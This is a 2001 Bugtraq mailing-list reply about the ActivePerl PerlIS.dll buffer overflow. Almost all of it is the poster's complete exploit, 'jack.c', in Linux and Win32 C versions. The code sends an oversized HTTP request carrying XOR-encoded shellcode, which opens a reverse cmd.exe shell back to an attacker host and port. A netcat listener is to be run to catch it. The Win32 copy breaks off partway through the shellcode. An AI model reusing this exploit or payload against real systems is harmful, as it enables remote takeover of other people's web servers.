Bugtraq mailing list archives

Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability


From: Indigo <indig0 () talk21 com>
Date: 21 Nov 2001 01:38:45 -0000

Mailer: SecurityFocus
In-Reply-To: <20011116015506.17854.qmail () mail securityfocus com>

Received: (qmail 4025 invoked from network); 16 
Nov 2001 04:11:34 -0000
Received: from outgoing2.securityfocus.com 
(HELO outgoing.securityfocus.com) (66.38.151.26)
 by mail.securityfocus.com with SMTP; 16 Nov 
2001 04:11:34 -0000
Received: from lists.securityfocus.com 
(lists.securityfocus.com [66.38.151.19])
      by outgoing.securityfocus.com (Postfix) 
with QMQP
      id 78A568F460; Thu, 15 Nov 2001 
20:31:32 -0700 (MST)
Mailing-List: contact bugtraq-
help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq () securityfocus com>
List-Help: <mailto:bugtraq-
help () securityfocus com>
List-Unsubscribe: <mailto:bugtraq-
unsubscribe () securityfocus com>
List-Subscribe: <mailto:bugtraq-
subscribe () securityfocus com>
Delivered-To: mailing list 
bugtraq () securityfocus com
Delivered-To: moderator for 
bugtraq () securityfocus com
Received: (qmail 26744 invoked from network); 16 
Nov 2001 02:03:39 -0000
Date: 16 Nov 2001 01:55:06 -0000
Message-ID: 
<20011116015506.17854.qmail@mail.securityfocus.c
om>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: Jim <raxor () dexlink com>
To: bugtraq () securityfocus com
Subject: Re: NSFOCUS SA2001-07 : ActivePerl 
PerlIS.dll Remote Buffer
   Overflow Vulnerability

Mailer: SecurityFocus
In-Reply-To: 
<20011115113830.45A9.SECURITY () nsfocus com>

Has anyone been able to duplicate this bug ? 

Am I wrong or does the ISAPI version of ActivePerl 
execute .plx files and not .pl as mentioned in the 
advisory ? 


Not only could I duplicate it, I exploited it. The exploit 
uses .pl as the extension.

Cheers,

Indigo.




Jack for Linux:


/*      jack.c - Active Perl ISAPI overflow exploit by 
Indigo <indig0 () talk21 com> 2001

        Usage: jack <victim host> <victim port> 
<attacker host> <attacker port>

        Before executing jack, start a netcat listener on 'attacker port'.
        The payload connects back to <attacker host>:<attacker port>, so that
        address must be reachable from the victim.

        eg:     nc -l -p 'attacker port'

        You may need to hit return a few times to 
get the prompt up

        main shellcode adapted from jill.c by dark 
spyrit <dspyrit () beavuh org>

        Greets to:

        Morphsta, Br00t, Macavity, Jacob & 
Monkfish...Not forgetting D-Niderlunds
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

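/*
 * Parse a decimal TCP port.
 *
 * text: NUL-terminated decimal string.
 * Returns the port (1..65535) or 0 when the text is not a whole number in
 * that range (0 is never a usable destination port, so it doubles as the
 * error value).
 */
static unsigned short parse_port(const char *text)
{
	char *end = NULL;
	long value;

	errno = 0;
	value = strtol(text, &end, 10);
	if (end == text || *end != '\0' || errno == ERANGE ||
	    value < 1 || value > 65535)
		return 0;
	return (unsigned short)value;
}

/*
 * Write the whole buffer to a blocking socket.
 *
 * fd:  connected socket.
 * buf: bytes to send.
 * len: number of bytes in buf.
 * Returns 0 once every byte has been handed to the kernel, -1 on a write
 * error (errno is left set).  Short writes and EINTR are retried; the
 * original posting ignored write()'s return value entirely.
 */
static int send_all(int fd, const unsigned char *buf, size_t len)
{
	while (len > 0) {
		ssize_t n = write(fd, buf, len);
		if (n < 0) {
			if (errno == EINTR)
				continue;
			return -1;
		}
		buf += n;
		len -= (size_t)n;
	}
	return 0;
}

/*
 * jack (Linux build) - sends a single HTTP request to the victim whose path
 * overflows ActivePerl's PerlIS.dll (NSFOCUS SA2001-07).  The request is
 *
 *     "GET /cgi-bin/" + 339 bytes of 'B' + saved-return-address overwrite
 *     + 4 bytes 'B' + XOR decoder + XOR-0x95-encoded payload + NOP sled
 *     + short stub + ".pl HTTP/1.0\r\n\r\n"
 *
 * The encoded payload carries the attacker's IPv4 address and port; the
 * decoded strings inside it ("WSOCK32", "connect", "CreateProcessA",
 * "cmd.exe", ...) are consistent with the header comment's instruction to
 * have a netcat listener waiting on <attacker host>:<attacker port>.
 *
 * argv: <victim host> <victim port> <attacker host> <attacker port>
 * Returns 0 after the request has been sent, 1 on any error.
 *
 * Differences from the original posting (the bytes sent for a well-formed
 * invocation are unchanged):
 *   - the attacker address is copied out of hostent with memcpy; the
 *     original read sizeof(unsigned long) bytes through h_addr, which
 *     over-reads the 4-byte IPv4 address on LP64 hosts;
 *   - port/address bytes are patched in network order instead of relying
 *     on the host being little-endian;
 *   - the request is sent by its known length, not strlen(); an attacker
 *     octet or port byte equal to 0x95 XOR-encodes to 0x00 and silently
 *     truncated the request before;
 *   - ports are range-checked, the payload layout is verified before it is
 *     patched, addresses are required to be IPv4, and write() is checked.
 */
int main(int argc, char *argv[])
{
	enum {
		PORT_OFF = 745,   /* first of the 2 encoded port bytes           */
		HOST_OFF = 750,   /* first of the 4 encoded IPv4 address bytes   */
		XOR_KEY  = 0x95   /* key the in-payload decoder XORs with        */
	};
	/*
	 * Values the posted payload carries at PORT_OFF / HOST_OFF, used to
	 * confirm the layout before patching: 0x8e 0xac ^ 0x95 = 0x1b 0x39
	 * (port 6969) and 0x55 0x3d 0x97 0x94 ^ 0x95 = 192.168.2.1.
	 */
	static const unsigned char port_default[2] = { 0x8e, 0xac };
	static const unsigned char host_default[4] = { 0x55, 0x3d, 0x97, 0x94 };

	unsigned char shellcode[] =
	/* "GET /cgi-bin/" */
	"\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f"
	/* 339 bytes of 'B' filler up to the saved return address */
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
	/*
	 * Last 3 filler bytes, the 4-byte return-address overwrite
	 * (0x77f8948b little-endian - a fixed address for one Windows build,
	 * not parameterised here), then 4 more filler bytes.
	 */
	"\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42"
	/*
	 * Decoder stub.  Reads as: jmp/call/pop to find its own address,
	 * add ebp,0x15; mov eax,ebp; xor ecx,ecx; mov cx,0x2d7; then
	 * "xor byte [eax],0x95 / inc eax / loop" over the bytes that follow.
	 * Everything after it up to the sled is therefore stored XOR 0x95.
	 */
	"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
	"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
	"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
	"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
	"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
	"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
	"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
	"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
	"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
	"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
	"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
	"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
	"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
	"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
	"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
	"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
	"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
	"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
	"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
	"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3e\x95\x95\x95\xa6\x55\xc5"
	"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
	/* PORT_OFF (bytes 10-11 of this line) and HOST_OFF (bytes 15-18) */
	"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x55\x3d\x97\x94"
	"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
	"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
	"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
	"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
	"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
	"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
	"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
	"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
	/*
	 * Encoded NUL-separated name table: "GetProcAddress", "LoadLibraryA",
	 * "CreatePipe", "GetStartupInfoA", "CreateProcessA", "PeekNamedPipe",
	 * "GlobalAlloc", "WriteFile", "ReadFile", "Sleep", "ExitProcess",
	 * "CloseHandle", "WSOCK32", "WSAStartup", "socket", "closesocket",
	 * "connect", "send", "recv", "cmd.exe" (each byte ^ 0x95).
	 */
	"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
	"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
	"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
	"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
	"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
	"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
	"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
	"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
	"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
	"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
	"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
	"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
	"\xf0\xed\xf0\x95"
	/* 337-byte NOP sled */
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	/*
	 * Short stub (xor eax,eax / mov al,0x90 / add ebx,eax / mov eax,[ebx]
	 * / mov eax,[eax+0x60] / ... / jmp eax / jmp back), presumably what
	 * the overwritten return address is meant to reach - not analysed.
	 */
	"\x33\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
	"\xeb\xb9\x90\x90\x05\x31\x8c\x6a"
	/* ".pl HTTP/1.0\r\n\r\n" + explicit NUL (.pl is what PerlIS.dll is mapped to) */
	"\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30\x0D\x0A\x0D\x0A\x00";

	/* Bytes on the wire: everything before the explicit \x00 (the array
	 * also carries the compiler's own terminator, hence -2). */
	const size_t request_len = sizeof shellcode - 2;
	unsigned short victim_port, attacker_port, nport;
	unsigned char port_bytes[2], host_bytes[4];
	struct hostent *ht;
	struct sockaddr_in victim;
	int s, i;

	printf("\njack - Active Perl ISAPI overflow launcher\nby Indigo <indig0 () talk21 com> 2001\n\n");

	if (argc != 5) {
		printf("Usage: %s <victim host> <victim port> <attacker host> <attacker port>\n", argv[0]);
		return 1;
	}

	victim_port = parse_port(argv[2]);
	attacker_port = parse_port(argv[4]);
	if (victim_port == 0 || attacker_port == 0) {
		fprintf(stderr, "ports must be decimal numbers in 1..65535\n");
		return 1;
	}

	/* Victim: resolved into a zeroed sockaddr_in (the original left
	 * sin_zero uninitialised). */
	ht = gethostbyname(argv[1]);
	if (ht == NULL || ht->h_addrtype != AF_INET || ht->h_length != 4) {
		fprintf(stderr, "%s: cannot resolve to an IPv4 address\n", argv[1]);
		return 1;
	}
	memset(&victim, 0, sizeof victim);
	victim.sin_family = AF_INET;
	victim.sin_port = htons(victim_port);
	memcpy(&victim.sin_addr, ht->h_addr_list[0], sizeof victim.sin_addr);

	/* Attacker: keep the 4 address bytes exactly as they sit in the
	 * hostent, i.e. already in network byte order. */
	ht = gethostbyname(argv[3]);
	if (ht == NULL || ht->h_addrtype != AF_INET || ht->h_length != 4) {
		fprintf(stderr, "%s: cannot resolve to an IPv4 address\n", argv[3]);
		return 1;
	}
	memcpy(host_bytes, ht->h_addr_list[0], sizeof host_bytes);

	/* Refuse to patch unless the placeholders are where the offsets
	 * say: a one-byte slip in the literal above would otherwise corrupt
	 * the payload silently. */
	if (request_len < HOST_OFF + sizeof host_bytes ||
	    memcmp(&shellcode[PORT_OFF], port_default, sizeof port_default) != 0 ||
	    memcmp(&shellcode[HOST_OFF], host_default, sizeof host_default) != 0) {
		fprintf(stderr, "payload layout mismatch at PORT_OFF/HOST_OFF; refusing to patch\n");
		return 1;
	}

	/* Pre-encode with the decoder's key so the XOR loop restores the
	 * real values.  A byte equal to 0x95 encodes to 0x00; that is now
	 * sent rather than truncating the request as strlen() did. */
	nport = htons(attacker_port);
	memcpy(port_bytes, &nport, sizeof port_bytes);
	for (i = 0; i < (int)sizeof port_bytes; i++)
		shellcode[PORT_OFF + i] = port_bytes[i] ^ XOR_KEY;
	for (i = 0; i < (int)sizeof host_bytes; i++)
		shellcode[HOST_OFF + i] = host_bytes[i] ^ XOR_KEY;

	s = socket(AF_INET, SOCK_STREAM, 0);
	if (s == -1) {
		perror("socket");
		return 1;
	}

	printf("\nSending exploit....\n");

	if (connect(s, (struct sockaddr *)&victim, sizeof victim) == -1) {
		perror("connect");
		close(s);
		return 1;
	}

	if (send_all(s, shellcode, request_len) != 0) {
		perror("write");
		close(s);
		return 1;
	}

	/* Give the kernel a moment to flush before the socket is torn down,
	 * as the original did. */
	sleep(1);
	close(s);

	printf("Exploit sent.\n\n");

	return 0;
}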


<CUT>



Jack for Win32:





/*      jack.c - Active Perl ISAPI overflow exploit by 
Indigo <indig0 () talk21 com> 2001

        Usage: jack <victim host> <victim port> 
<attacker host> <attacker port>

        Before executing jack, start a netcat listener on 'attacker port'.
        The payload connects back to <attacker host>:<attacker port>, so that
        address must be reachable from the victim.

        eg:     nc -l -p 'attacker port'

        You may need to hit return a few times to 
get the prompt up

        main shellcode adapted from jill.c by dark 
spyrit <dspyrit () beavuh org>

        Greets to:

        Morphsta, Br00t, Macavity, Jacob & 
Monkfish...Not forgetting D-Niderlunds
*/


#include <windows.h>
#include <winsock.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


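// Parse a decimal TCP port.
//
// text: NUL-terminated decimal string.
// Returns the port (1..65535) or 0 when the text is not a whole number in
// that range.  strtol() saturates on overflow, so out-of-range input lands
// in the rejected branch as well.
static unsigned short parse_port(const char *text)
{
        char *end = NULL;
        long value = strtol(text, &end, 10);

        if (end == text || *end != '\0' || value < 1 || value > 65535)
                return 0;
        return (unsigned short)value;
}

// Send the whole buffer over a blocking socket.
//
// s:   connected socket.
// buf: bytes to send.
// len: number of bytes in buf.
// Returns 0 once every byte has been accepted, -1 on SOCKET_ERROR or a
// zero-length send.  The original only tested the first send() for 0.
static int send_all(SOCKET s, const unsigned char *buf, int len)
{
        while (len > 0) {
                int n = send(s, (const char *)buf, len, 0);
                if (n == SOCKET_ERROR || n == 0)
                        return -1;
                buf += n;
                len -= n;
        }
        return 0;
}

// jack (Win32 build) - sends a single HTTP request to the victim whose path
// overflows ActivePerl's PerlIS.dll (NSFOCUS SA2001-07).  The request is
//
//     "GET /cgi-bin/" + 339 bytes of 'B' + saved-return-address overwrite
//     + 4 bytes 'B' + XOR decoder + XOR-0x95-encoded payload + NOP sled
//     + short stub + ".pl HTTP/1.0\r\n\r\n"
//
// The encoded payload carries the attacker's IPv4 address and port; the
// decoded strings inside it ("WSOCK32", "connect", "CreateProcessA",
// "cmd.exe", ...) are consistent with the header comment's instruction to
// have a netcat listener waiting on <attacker host>:<attacker port>.
//
// argv: <victim host> <victim port> <attacker host> <attacker port>
//       (both hosts as dotted-quad IPv4 literals - inet_addr() does no DNS)
// Returns 0 after the request has been sent, 1 on any error.
//
// Differences from the original posting (the bytes sent for a well-formed
// invocation are unchanged):
//   - argc is checked for exactly 5 arguments; the original accepted
//     argc >= 2 and then read argv[3]/argv[4] out of bounds;
//   - inet_addr() failures, WSAStartup(), socket() and connect() errors are
//     reported instead of silently exiting 0;
//   - port/address bytes are patched in network order instead of relying
//     on the host being little-endian;
//   - the request is sent by its known length, not strlen(); an attacker
//     octet or port byte equal to 0x95 XOR-encodes to 0x00 and silently
//     truncated the request before;
//   - ports are range-checked and the payload layout is verified before it
//     is patched.
int main(int argc, char **argv)
{
        enum {
                PORT_OFF = 745,   // first of the 2 encoded port bytes
                HOST_OFF = 750,   // first of the 4 encoded IPv4 address bytes
                XOR_KEY  = 0x95   // key the in-payload decoder XORs with
        };
        // Values the posted payload carries at PORT_OFF / HOST_OFF, used to
        // confirm the layout before patching: 0x8e 0xac ^ 0x95 = 0x1b 0x39
        // (port 6969) and 0x55 0x3d 0x97 0x94 ^ 0x95 = 192.168.2.1.
        static const unsigned char port_default[2] = { 0x8e, 0xac };
        static const unsigned char host_default[4] = { 0x55, 0x3d, 0x97, 0x94 };

        unsigned char shellcode[] =
        // "GET /cgi-bin/"
        "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f"
        // 339 bytes of 'B' filler up to the saved return address
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        // Last 3 filler bytes, the 4-byte return-address overwrite
        // (0x77f8948b little-endian - a fixed address for one Windows
        // build, not parameterised here), then 4 more filler bytes.
        "\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42"
        // Decoder stub.  Reads as: jmp/call/pop to find its own address,
        // add ebp,0x15; mov eax,ebp; xor ecx,ecx; mov cx,0x2d7; then
        // "xor byte [eax],0x95 / inc eax / loop" over the bytes that
        // follow.  Everything after it up to the sled is stored XOR 0x95.
        "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
        "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
        "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
        "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
        "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
        "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
        "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
        "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
        "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
        "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
        "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
        "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
        "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
        "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
        "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
        "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
        "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
        "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
        "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
        "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3e\x95\x95\x95\xa6\x55\xc5"
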